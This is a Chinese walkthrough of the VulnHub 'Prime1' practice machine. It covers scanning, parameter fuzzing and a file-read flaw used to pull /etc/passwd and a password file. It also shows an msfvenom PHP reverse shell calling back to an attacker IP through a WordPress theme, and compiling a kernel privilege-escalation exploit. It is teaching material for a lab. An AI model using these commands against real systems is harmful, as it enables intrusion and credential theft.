prime1--vulnhub靶场通关教程

2024-04-29 10:04

本文主要是介绍prime1--vulnhub靶场通关教程,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

一. 信息收集

1. 探测目标主机IP地址

arp-scan -l  //查看网段

vm  编辑--查看虚拟网络编辑器,看到靶机的网段

网段是: 192.168.83.0

是c段网络

2. 全面检测目标IP

nmap -sP 192.168.83.1/24

靶机ip是:

192.168.83.145

攻击机的ip是:

192.168.83.136

3.扫描端口

端口和服务是对应关系的根据计算机网络的应用层协议

扫描端口

nmap -p 1-65535 -A 192.168.83.145

看到了22端口--ssh协议 和80端口--http服务打开

访问页面

4.目录扫描

dirb http://192.168.83.145

得到信息常见字典:/usr/share/dirb/wordlists/common.txt

查看字典内容:less /usr/share/dirb/wordlists/common.txt

还看到了wordpress的信息这个是个人博客搭建的常用方式

还有个dev的信息看不懂可能存在有用信息

知识点:

curl 是一个常用的命令行工具,用于从或向服务器传输数据,支持多种协议,如 HTTP、HTTPS、FTP 等。它经常用于发送请求到 Web 服务器并获取响应,或者用于自动化脚本和文件传输。

curl http://192.168.83.145/dev

译文:

你好,

现在你处于0级阶段。

在现实生活中的渗透测试中,我们应该使用我们的工具来深入挖掘一个网站。

祝你黑客行动愉快。

5.扫描文件名后缀为.txt

dirb操作-X指定文件后缀,对.txt,.cfg等文件后缀中存放有用的信息

man dirb 操作指令书

dirb http://192.168.83.145 -X .txt,.php,.zip

扫到了secret.txt

查看内容

curl http://192.168.83.145/secret.txt

译文:看起来你得到了一些秘密。

好吧,我只是想帮你一下。

对你找到的每个PHP页面进行更多的模糊测试。如果你得到了任何正确的参数,就按照下面的步骤操作。如果你还是卡住了,
那就从这里学习一个对OSCP很有用的基础工具。

Fuzzing/Fuzz_For_Web at master · hacknpentest/Fuzzing · GitHub

//查看location.txt文件,你将得到下一步的行动指示//

注意:kali是自带fuzz的工具的 z

二. 渗透过程

1.爆破参数

页面index.php,参数para,访问文件location.php

Wfuzz -w  /usr/share/dirb/wordlists/common.txt http://192.168.83.145/index.php?FUZZ

得到4614返回参数包

wfuzz -w /usr/share/dirb/wordlists/common.txt --hw 12 http://192.168.83.145/index.php?FUZZ

过滤掉返回参数为200个字的得到参数file

2.读取文件

看到file参数想到文件读取

curl http://192.168.83.145/index.php?file=location.txt

读取内容

翻译

hnp security 做得更出色一些
好的,现在你找到了确切的参数
现在继续深入挖掘下一个参数
在其他的PHP页面上使用'secrettier360'参数,会有更多乐趣。

curl http://192.168.83.145/image.php?secrettier360

Image.php是之前dirb扫到的

读取敏感文件(Linux系统)

密码:/etc/passwd

配置 /etc/my.ini

查看 /etc/passwd

curl http://192.168.83.145/image.php?secrettier360=/etc/passwd

curl http://192.168.83.145/image.php?secrettier360=/home/saket/password.txt

读取密码

密码是:   follow_the_ippsec

之前扫到了ssh,http wordpress,那密码对应的是什么服务呢

尝试:

ssh -p 22 victor@192.168.83.145

登录失败了

3.Wordpress登录尝试

wpscan --url http://192.168.83.145/wordpress/ --enumerate u  

扫描用户

wordepress登录

登录成功了

在主题编辑器提权

找到可以上传php代码的界面了

4.反弹shell控制靶机

Msf:漏洞库、攻击脚本、提权脚本

Msf生成反弹链接的 payload

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.83.136 lport=7777 -o shell.php

生成php反弹shell脚本

注意ip地址是攻击机和端口设置

msf6 > use exploit/multi/handler

[*] Using configured payload generic/shell_reverse_tcp

msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp

payload => php/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set lhost 192.168.83.136

lhost => 192.168.83.136

msf6 exploit(multi/handler) > set lport 7777

lport => 7777

msf6 exploit(multi/handler) > exploit

开始监听监听

访问页面

http://192.168.83.145/wordpress/wp-content/themes/twentynineteen/secret.php

监听成功拿到权限

三. Linux提权

1. 确定操作系统信息

Sysinfo

2. 搜索操作系统漏洞

继续使用searchsploit工具搜索漏洞 ,打开另一个终端

searchsploit Ubuntu 16.04

searchsploit简介

漏洞查找工具,可以通过操作系统或cms的版本号搜索到相应漏洞,通过查看说明即可找到漏洞利用方法

查到对应版本的漏洞

Privilege Escalation(提权),这里我们使用通用4.4.x版本的提权方式,完整path

这个文件路径记一下比较好

cp /usr/share/exploitdb/exploits/linux/local/45010.c ./

复制漏洞到当前文件夹中

gcc 45010.c -o 45010

编译提权脚本

切换到meterpreter终端即再打开一个msf

upload /home/kali/Desktop/45010 /tmp/45010

上传到/tmp目录下

添加执行的权限

Chmod +x 45010

./45010执行

拿到权限了

不知道为什么执行c文件失败了就差最后一步了可惜

这篇关于prime1--vulnhub靶场通关教程的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/945789

相关文章

基于C#实现PDF转图片的详细教程

《基于C#实现PDF转图片的详细教程》在数字化办公场景中,PDF文件的可视化处理需求日益增长,本文将围绕Spire.PDFfor.NET这一工具,详解如何通过C#将PDF转换为JPG、PNG等主流图片... 目录引言一、组件部署二、快速入门:PDF 转图片的核心 C# 代码三、分辨率设置 - 清晰度的决定因

Java Scanner类解析与实战教程

《JavaScanner类解析与实战教程》JavaScanner类(java.util包)是文本输入解析工具,支持基本类型和字符串读取,基于Readable接口与正则分隔符实现,适用于控制台、文件输... 目录一、核心设计与工作原理1.底层依赖2.解析机制A.核心逻辑基于分隔符(delimiter)和模式匹

spring AMQP代码生成rabbitmq的exchange and queue教程

《springAMQP代码生成rabbitmq的exchangeandqueue教程》使用SpringAMQP代码直接创建RabbitMQexchange和queue,并确保绑定关系自动成立,简... 目录spring AMQP代码生成rabbitmq的exchange and 编程queue执行结果总结s

python使用Akshare与Streamlit实现股票估值分析教程(图文代码)

《python使用Akshare与Streamlit实现股票估值分析教程(图文代码)》入职测试中的一道题,要求:从Akshare下载某一个股票近十年的财务报表包括,资产负债表,利润表,现金流量表,保存... 目录一、前言二、核心知识点梳理1、Akshare数据获取2、Pandas数据处理3、Matplotl

Python pandas库自学超详细教程

《Pythonpandas库自学超详细教程》文章介绍了Pandas库的基本功能、安装方法及核心操作,涵盖数据导入(CSV/Excel等)、数据结构(Series、DataFrame)、数据清洗、转换... 目录一、什么是Pandas库(1)、Pandas 应用(2)、Pandas 功能(3)、数据结构二、安

2025版mysql8.0.41 winx64 手动安装详细教程

《2025版mysql8.0.41winx64手动安装详细教程》本文指导Windows系统下MySQL安装配置,包含解压、设置环境变量、my.ini配置、初始化密码获取、服务安装与手动启动等步骤,... 目录一、下载安装包二、配置环境变量三、安装配置四、启动 mysql 服务,修改密码一、下载安装包安装地

电脑提示d3dx11_43.dll缺失怎么办? DLL文件丢失的多种修复教程

《电脑提示d3dx11_43.dll缺失怎么办?DLL文件丢失的多种修复教程》在使用电脑玩游戏或运行某些图形处理软件时,有时会遇到系统提示“d3dx11_43.dll缺失”的错误,下面我们就来分享超... 在计算机使用过程中,我们可能会遇到一些错误提示,其中之一就是缺失某个dll文件。其中,d3dx11_4

Linux下在线安装启动VNC教程

《Linux下在线安装启动VNC教程》本文指导在CentOS7上在线安装VNC,包含安装、配置密码、启动/停止、清理重启步骤及注意事项,强调需安装VNC桌面以避免黑屏,并解决端口冲突和目录权限问题... 目录描述安装VNC安装 VNC 桌面可能遇到的问题总结描js述linux中的VNC就类似于Window

Go语言编译环境设置教程

《Go语言编译环境设置教程》Go语言支持高并发(goroutine)、自动垃圾回收,编译为跨平台二进制文件,云原生兼容且社区活跃,开发便捷,内置测试与vet工具辅助检测错误,依赖模块化管理,提升开发效... 目录Go语言优势下载 Go  配置编译环境配置 GOPROXYIDE 设置(VS Code)一些基本

Windows环境下解决Matplotlib中文字体显示问题的详细教程

《Windows环境下解决Matplotlib中文字体显示问题的详细教程》本文详细介绍了在Windows下解决Matplotlib中文显示问题的方法,包括安装字体、更新缓存、配置文件设置及编码調整,并... 目录引言问题分析解决方案详解1. 检查系统已安装字体2. 手动添加中文字体(以SimHei为例)步骤